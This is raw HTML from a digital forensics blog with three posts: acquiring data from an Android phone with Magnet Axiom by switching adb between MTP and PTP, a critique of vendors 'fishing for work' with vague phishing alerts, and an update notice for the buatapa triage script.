<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio-Y6VIGzDDi5BBSZfwePhvxgirl25IKTi6K_Hwcmi0saJgJwcFE_jwoNEXPnHgGvVdJhnhKzOezYue62fUQuaJw1XPuJrrXHrj1JzEzsHXoZgs8kfJ7AmSHvfpogGCaRRvCGLDRqI_VM6/s1600/ChargingOnly.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1233" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio-Y6VIGzDDi5BBSZfwePhvxgirl25IKTi6K_Hwcmi0saJgJwcFE_jwoNEXPnHgGvVdJhnhKzOezYue62fUQuaJw1XPuJrrXHrj1JzEzsHXoZgs8kfJ7AmSHvfpogGCaRRvCGLDRqI_VM6/s640/ChargingOnly.jpg" width="492" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Charging, the usual method, does not work </i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyFYedSBuG7kBiqhthmAMgQXSyODuRhkgz48bIs_CgOcF0x_ZEOTn9OhhZ_lmnUTRpl3BFYjlo5_dvZsV_hQ33NzDtGExu9gdap0bG7WUdSqI29TCpF6Da_nVMNEAfHcq5U1BQo2068wBe/s1600/adb-no-devices-charging.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="494" data-original-width="1393" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyFYedSBuG7kBiqhthmAMgQXSyODuRhkgz48bIs_CgOcF0x_ZEOTn9OhhZ_lmnUTRpl3BFYjlo5_dvZsV_hQ33NzDtGExu9gdap0bG7WUdSqI29TCpF6Da_nVMNEAfHcq5U1BQo2068wBe/s640/adb-no-devices-charging.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>No devices shown in adb</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />So, the next step is to see if perhaps we connect with MTP (Media Transfer Protocol), it will allow adb to recognize the device. It is a different protocol, and I know from past experience that sometimes different protocols means the difference between working or not. When I chose MTP from the Developer Options, I was *finally* presented with the desired "Allow USB debugging" prompt, which also lists the unique computer fingerprint. So...success!!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizEYT2dOtGw4WSwBSy7WttWS73JSUmd8i-Ex99IV5sj4Y6Xm4HTMKBPt_rpC8tzoyJuL7xk3YtUZ8q2hnRjCuYncLL5IIpFwn5VDGNAYYUd40e6NKJFhjeO89JUONfihTv2-9o8NJWJJWU/s1600/MTPPicked.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1172" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizEYT2dOtGw4WSwBSy7WttWS73JSUmd8i-Ex99IV5sj4Y6Xm4HTMKBPt_rpC8tzoyJuL7xk3YtUZ8q2hnRjCuYncLL5IIpFwn5VDGNAYYUd40e6NKJFhjeO89JUONfihTv2-9o8NJWJJWU/s640/MTPPicked.jpg" width="468" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>MTP is picked as the USB connection on the device</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2hQBNtgijIuQxK6S2d9bDE01xCgO4-feCoP1eWDZ9ttwN944OZr6ASaDe84FbGGUDXb7znAs-epFvW49usmLrRKESWkTZTKhxaUw1aXPSlfmXj4Kh4eC3Jb1q_EHI2xoVPWMy33E97Z6M/s1600/USB-Debugging.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1169" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2hQBNtgijIuQxK6S2d9bDE01xCgO4-feCoP1eWDZ9ttwN944OZr6ASaDe84FbGGUDXb7znAs-epFvW49usmLrRKESWkTZTKhxaUw1aXPSlfmXj4Kh4eC3Jb1q_EHI2xoVPWMy33E97Z6M/s640/USB-Debugging.jpg" width="465" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Finally, debugging options show up on the device with MTP!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />Or not. adb recognizes the device and allows me to send commands, such as making a backup, but what I need is the Magnet agent to be pushed to the device so we can get the user data, such as SMS, contacts, call history, etc. When connected via MTP, it seems the Aristo allows some data to be transferred from the device to a system, but it does not allow data to go from the system to the mobile device. Curses!! Foiled again!!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE6KocwngMo5KxQ8d8ZYSIO8DQqXDFepHv47m0-_R3VN7UByEFHCUApqOEkzR4Jkbp0G-Uufe6hVDpLV0jOYeynBvPrP3JisAjaUVwSFMlpjrw2SrlJNBF91vRLHquEkWtgea1M8nVn2Uk/s1600/adb-mtp-then-ptp.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="672" data-original-width="1600" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE6KocwngMo5KxQ8d8ZYSIO8DQqXDFepHv47m0-_R3VN7UByEFHCUApqOEkzR4Jkbp0G-Uufe6hVDpLV0jOYeynBvPrP3JisAjaUVwSFMlpjrw2SrlJNBF91vRLHquEkWtgea1M8nVn2Uk/s640/adb-mtp-then-ptp.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>abd recognizes the device with MTP. Partial success!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /><br />After deliberating, some adb-kung-fu, and using Google to search for additional options, I decided to try using PTP (Picture Transfer Protocol). adb still recognized the device, however, for reasons that COMPLETELY elude me, setting it up this way allowed not only the backup to be performed, but ALSO allowed data (aka the Magnet agent) to be pushed to the device! At last, I finally had success!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjXqvLbGbuJKGMbxJlHTVaMF_5RZwPto-BykBUTCeDB3IQifsEEsIIRApVh28ePhwozstdStZd0_IttrurASgLPJGx5gFSkshonxMtnexF_Cmuej5xCyDTkIM3bKaBwn_iKudYRweYTduw/s1600/PTP-picked.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1246" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjXqvLbGbuJKGMbxJlHTVaMF_5RZwPto-BykBUTCeDB3IQifsEEsIIRApVh28ePhwozstdStZd0_IttrurASgLPJGx5gFSkshonxMtnexF_Cmuej5xCyDTkIM3bKaBwn_iKudYRweYTduw/s640/PTP-picked.jpg" width="498" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Now we choose the PTP option. For some reason, this choice works!!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsUd8eGB3O2tZ1KrnsKH2noNRnd8LjfaDIKhi1oYl53INJVEyr8N6fptaN73tc5qPcPMOMrvx3_aBKR8JdgwmUqKileDaCjQ3iHAiWm6H73OouQpVTgumKaXkrhjXGuLbS6FMwR5-ZfsO/s1600/axiom-ptp-unlocked-acq.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="974" data-original-width="1600" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQsUd8eGB3O2tZ1KrnsKH2noNRnd8LjfaDIKhi1oYl53INJVEyr8N6fptaN73tc5qPcPMOMrvx3_aBKR8JdgwmUqKileDaCjQ3iHAiWm6H73OouQpVTgumKaXkrhjXGuLbS6FMwR5-ZfsO/s640/axiom-ptp-unlocked-acq.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>In Axiom, we choose the ADB (Unlocked) method</i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8FuHE9DrXgD_q11nVop_rltRIQ5iN25IyKvOLW281b-XzNuENFHlBDd3PsZsnafFtz3T2a35IBy1qWFVUdAOPFJ0DN4dFfceIkrYKEGq9DXLVhaNjh3AnfuobVZimnF2QIL1ccqPyyoCf/s1600/showsupinaxiom.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="981" data-original-width="1600" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8FuHE9DrXgD_q11nVop_rltRIQ5iN25IyKvOLW281b-XzNuENFHlBDd3PsZsnafFtz3T2a35IBy1qWFVUdAOPFJ0DN4dFfceIkrYKEGq9DXLVhaNjh3AnfuobVZimnF2QIL1ccqPyyoCf/s640/showsupinaxiom.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Finally! With the PTP connection, AXIOM recognizes the device!</i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSJ528VNJg0mZ1s9vjhaIHqJvNma6K1kcifZeCL9dPaVe9ewwP-PtsqS2WKYjkvBmwqa8EM_HGTdm4WOC86QY9JUueD7VU47hwCuvCggtkyDB0dYN0ZyGA2VlkKE2qxdlvggkGi05hymkj/s1600/readyToImage.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="677" data-original-width="1600" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSJ528VNJg0mZ1s9vjhaIHqJvNma6K1kcifZeCL9dPaVe9ewwP-PtsqS2WKYjkvBmwqa8EM_HGTdm4WOC86QY9JUueD7VU47hwCuvCggtkyDB0dYN0ZyGA2VlkKE2qxdlvggkGi05hymkj/s640/readyToImage.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Ready to start processing!</i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSUMprUSHbmbasUTo0_cyALhZO7i8Cgq-Frmcb4doSHRCrHmrclRvntb6JE_h0JIZ5l-sDiW25LpvqpDBtFF5jNrJCQkKE_GwhCZYJSKQJ42Mjm6tIKsEUx4qwcxtlpC0L1AWVOD-vQQxW/s1600/RunningAtLast.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="755" data-original-width="1600" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSUMprUSHbmbasUTo0_cyALhZO7i8Cgq-Frmcb4doSHRCrHmrclRvntb6JE_h0JIZ5l-sDiW25LpvqpDBtFF5jNrJCQkKE_GwhCZYJSKQJ42Mjm6tIKsEUx4qwcxtlpC0L1AWVOD-vQQxW/s640/RunningAtLast.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Data acquisition as begun at last!</i></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmhdnDttkjW2uFIc8_GSMRUbmCi3C97A1NP78GKqlDo0LoPaDIA4m2v2u5GV8vHfb6p4_1L9ItLv-xbm3C4-jjOjq5AaRDZ414QW9Awac8QMVd5JU_wKgNocIum5MquyExxaeT-ID5Ia8m/s1600/ReadyToRockAtLast.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="588" data-original-width="1600" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmhdnDttkjW2uFIc8_GSMRUbmCi3C97A1NP78GKqlDo0LoPaDIA4m2v2u5GV8vHfb6p4_1L9ItLv-xbm3C4-jjOjq5AaRDZ414QW9Awac8QMVd5JU_wKgNocIum5MquyExxaeT-ID5Ia8m/s640/ReadyToRockAtLast.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Our data has been acquired!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Interestingly enough, however, when I completely cleared the Trusted Devices on the mobile device, I could not get the "Trust Connections from this device" prompt to show up using a PTP connection. So, as long as you follow the method below, you *may* be able to get data from a severely locked down mobile device!<br /><br />0) Get familiar with using adb from the command line. </span><br />
<span style="font-size: large;"><i>It is a free download, and most commercial tools use adb behind the scenes. If you do any work with Android devices, you should know some basics of adb!</i></span><br />
<span style="font-size: large;"><i><br /></i>1) Connect the device using the MTP protocol. </span><br />
<span style="font-size: large;">2) When presented with the Trust Connections prompt on the device, choose OK and make sure the "Always allow from this computer" box is checked</span><br />
<span style="font-size: large;">3) Change the connection protocol to PTP</span><br />
<span style="font-size: large;">4) Acquire the device using Magnet Axiom</span><br />
<span style="font-size: large;">5) ....</span><br />
<span style="font-size: large;">6) PROFIT!!<br /><br /><br />One additional note I would like to add about the Magnet agent when using Magnet Axiom to acquire data from a device. In my opinion, it is very important to choose the "Remove agent from device upon completion" option, found under Settings, when acquiring data from a mobile device. We ran into this issue with the agent being left behind when processing mobile devices during forward deployments. When we had devices associated with high value entities, the final step in data acquisition was that we would have to interact with the device and manually remove the agent and acquisition log(s). (NOTE: it was not Magnet, as they did not exist at the time, it was another vendor who I will not publicly name.) It is entirely up to the end user if they feel comfortable leaving behind an agent or not. I definitely do not and will always choose to remove it. I just wanted to specifically point that out to anyone using Axiom to get data from mobile devices!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBZslk2wR-ZCQ6NovdzDVBcERdDkMx6lB7-nWHZ4Vv3DsZ2hK2AiH_Nkhz3LqOCVEt-Qv859WNIMiLB5daFcw-RUgMjhyCGmiqm5iKhLG8rocr9ZFIZAH8Af091ujuvGsmXDTz-ec5RRYE/s1600/axiom-agent-settings.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="474" data-original-width="1600" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBZslk2wR-ZCQ6NovdzDVBcERdDkMx6lB7-nWHZ4Vv3DsZ2hK2AiH_Nkhz3LqOCVEt-Qv859WNIMiLB5daFcw-RUgMjhyCGmiqm5iKhLG8rocr9ZFIZAH8Af091ujuvGsmXDTz-ec5RRYE/s640/axiom-agent-settings.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>To change the agent settings, Open Process, Navigate to Tools, then Settings</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKKj89UlbhMhGoHQM245JqiNZhnB9eZhx50VsFdMq4uGvUeRAC2HDKsiKSFC5Y4SZh-cY1ECvWXADv7j1D348H0TnkhEe5mz32F3YtsYzuU7YrYyFXx07Ex7jv7puN1zE3gNWkp8soxQIO/s1600/Agent_Settings_Not-Checked.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="920" data-original-width="1287" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKKj89UlbhMhGoHQM245JqiNZhnB9eZhx50VsFdMq4uGvUeRAC2HDKsiKSFC5Y4SZh-cY1ECvWXADv7j1D348H0TnkhEe5mz32F3YtsYzuU7YrYyFXx07Ex7jv7puN1zE3gNWkp8soxQIO/s640/Agent_Settings_Not-Checked.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Check the "Restore Device State" box to remove the Magnet agent after acquisition</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-39294364705170490452018-04-06T11:34:00.000-04:002018-04-06T11:34:24.847-04:00Fishing for work is almost as bad as phishing (for anything)<div style="color: #222222; font-family: arial, sans-serif;">
<br /></div>
<div>
<div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Hello again readers and welcome back! The topic of today's blog post is something that we posted on a few years back, but unfortunately it’s worth repeating again. Companies (both large and small) who provide any kind of cyber security services have a responsibility to anyone they interact with to be completely transparent particularly when words like “breach”, “victim”, and “target” start getting thrown around. Case in point is an email that a client received from a large, well-established, cyber security services company a few weeks ago that caused a bit of internal alarm that ultimately did not contain enough information to be actionable.</span></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;">In short, sharing information, threat intelligence, tactics/techniques/procedures (TTPs), indicators of compromise (IOCs), etc is something that ALL of us in the industry need to do better. I applaud the sharing of IOCs and threat information (when it’s unclassified, obviously). If this particular email had simply contained that information in a timely manner, I would have applauded the initiative. Unfortunately the information sharing of a seven month old phish consisted of: </span></div>
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890"><span style="font-family: "arial" , "helvetica" , sans-serif;">
<span style="font-size: large;"><br /></span></span></span><br />
<ul><span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890">
<li style="color: #222222;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">four domains</span></li>
<li style="color: #222222;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">tentative attribution to Kazakhstan, but zero supporting evidence</span></li>
<li style="color: #222222;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">“new” (but, admittedly, unanalyzed) malware, including an MD5 hash, and of course, </span></li>
<li style="color: #222222;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">a sales pitch</span></li>
</span></ul>
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890">
</span>
<div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span></span></span></div>
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890">
<div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">The recipient of this email attempted to find out more information, but was ultimately turned off by a combination of the tone and was unsure if the information was valid, or if it was just a thinly veiled sales pitch. They reached out to us directly for assistance.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span></div>
</span><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div style="color: #222222;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;">I passed this particular information on to others within the information security field, and recently </span><a href="https://www.arbornetworks.com/blog/asert/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" style="color: #1155cc; text-decoration-line: none;"><span style="color: blue; vertical-align: baseline; white-space: pre-wrap;">Arbor Networks actually put out a much more comprehensive overview of this activity</span></a><span style="color: black; vertical-align: baseline; white-space: pre-wrap;">, with a whole bunch of indicators and information that was not included, or even alluded to, in this particular email. I wish that more companies would take the initiative and do research into actors and campaigns such as this. If I were a CIO, and I was looking for a particular indicator from an email, but in searching for more information I came across the information in the Arbor post, I would be much more inclined to engage with Arbor if myself/my team needed external resources, than I would from an email that may have had good intentions, but felt like a services fishing expedition.</span></span></div>
<div style="color: #222222;">
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif; font-size: large; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div style="color: #222222;">
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif; font-size: large; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; vertical-align: baseline; white-space: pre-wrap;">On the exact opposite end of the spectrum, <a href="https://medium.com/@djhoulihan/no-panera-bread-doesnt-take-security-seriously-bf078027f815" rel="nofollow" target="_blank"><span style="color: blue;">the outreach of the recent Panera data loss was done perfectly.</span></a> </span><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;">In the original email, the individual attempted to contact the proper security individuals, had no luck initially, was very disappointed by the initial response from Panera, and tried repeatedly to work with the team. The team at Panera pretty much did nothing until they went public with the issue just a few days ago, which (finally) spurred Panera to react, albeit in a less than satisfactory fashion, again. To be 100% honest, if I were in that situation I would have done everything exactly the same way. It is a sad state of affairs when we as customers/consumers are more concerned with companies protecting our own information, than the companies who are charged with the care of that information for their services/loyalty programs/etc. </span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span><div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><br class="gmail-kix-line-break" /></span><span style="color: black; vertical-align: baseline; white-space: pre-wrap;">Additionally, no one wants to hear that their company or team has security issues, but responsible disclosure methods are always the way to go. However, it is hard for companies and individuals who are trying to do the right thing to highlight and address issues when “fishing for work” is so pervasive. I’ve seen many companies blow off security notifications as scams and ignore them completely, due precisely to this pervasive problem of fishing for work. </span></span></div>
<div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"> </span></span></div>
<div dir="ltr" style="color: #222222; line-height: 1.38; margin: 0pt 11pt; text-align: center;">
<span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><img height="341" src="https://lh6.googleusercontent.com/u4HJWP4u8YW5DpxOxLB_DHqk4f_V9uwrdNFtxY46AgcWpgG9O_x5RY5nMGoic57votQS-CSVjdBANV3-1vh_kMf9EfDdrjNRawDZXXL6xrWDgkbUTLEYasMzsiyYu92KGwUwxdxn" style="border: none; transform: rotate(0rad);" width="427" /></span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span><div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;">So ideally, how can we share information better?</span><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><br class="gmail-kix-line-break" /></span></span></div>
<span style="font-family: inherit; font-size: large;"><ol>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Join information sharing programs and network (Twitter, LinkedIn, conferences, etc.)</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Don’t “cold call” unless you have no other option. The process works much better when you already have a relationship (or know someone who does)</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Share complete, useful, and actionable information: recognize that not all companies can search the same way, due to limitations in resources available and even policy, regulations, and even privacy laws. Some companies cannot search by email, while others will need traditional IOCs (IPs, domains, hashes (not just MD5 hashes, also include SHA1 and SHA256 if you can)). </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Include the body of the phishing email and the complete headers--if the company is unable to search for the IOCs, they may be able to determine that it was likely blocked by their security stack </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Be timely. Sharing scant details of a phish from seven months ago goes well beyond the capabilities threshold of most companies </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Be selective in how and to whom you share. Sending these “helpful” notifications to C-levels are guaranteed to bring the infosec department to a full-stop while they work on only this specific threat, real, imagined, or incorrect. Which brings me to #7….</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="white-space: pre;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Make sure (</span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">absolutely sure</span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) you are correct. “Helpful notifications” that are based on incorrect information and lack of technical expertise are common enough that a large company could have days of downtime dedicated to them. (</span><span style="font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">And if the client themselves points out your technical errors with factual observations, consider the possibility that you might be wrong, apologize profusely, and DO NOT keep calling every day</span></span><span style="vertical-align: baseline; white-space: pre-wrap;">)</span></span></li>
</ol>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="white-space: pre-wrap;"><br /></span></span></div>
</span><ol>
</ol>
</span></div>
Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com1tag:blogger.com,1999:blog-1547389155659419533.post-81871887657246801972018-01-30T10:47:00.002-05:002018-01-30T11:06:25.630-05:00Several minor updates to buatapa!<br />
<span style="font-size: large;">Hello again readers and welcome back! I am pleased to announce that today there is a brand new, updated version of buatapa! Over the past several months I've had requests for better in script feedback on some of the ways that buatapa processed the results of autoruns, but just have not had the free time to sit down and try to work on implementing them. The new version is a little more "wordy", as it tries the best that it can to help the user if there are processing problems. For example, if you did not run autoruns with the needed flags, buatapa will recognize that from the output file you are running and suggest you run it again. For those on Mac (and maybe a few *nix systems), it also tells you if you do not have the proper permissions to access the autoruns output file.<br /><br /><br />There are also some slight changes to the interior processing and a little better logic flow. All in all, buatapa has held up quite well since the early testing nearly three years ago, and hopefully is a useful tool in helping to try to triage Windows systems within your environment.<br /><br /><br /><br />If you have any questions or encounter any bugs/issues, please do not hesitate to reach out!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">buatapa_0_0_7.zip - <a href="https://www.brimorlabs.com/Tools/Scripts/Python/buatapa_0_0_7.zip" target="_blank">download here</a> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">MD5: 8c2f9dc33094b3c5635bd0d61dbeb979</span><br />
<span style="font-size: large;">SHA-256: c1f67387484d7187a8c40171d0c819d4c520cb8c4f7173fc1bba304400846162</span><br />
<span style="font-size: large;">Version 0.0.7</span><br />
